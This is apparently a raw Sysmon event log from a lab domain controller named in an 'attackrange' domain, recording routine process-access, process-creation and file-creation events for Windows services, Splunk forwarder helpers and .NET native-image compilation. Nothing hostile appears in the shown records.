13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:49.061{59A5CD1D-9184-6005-B802-00000000A301}48762356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:49.874{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.983{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BE02-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:56.983{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BE02-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:56.920{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10d0-0\System.Web.ApplicationServices.dll2021-01-18 13:47:56.920 10341000x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:56.874{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.858{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:56.858{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.827{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BC02-00000000A301}2896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.795{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BC02-00000000A301}2896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 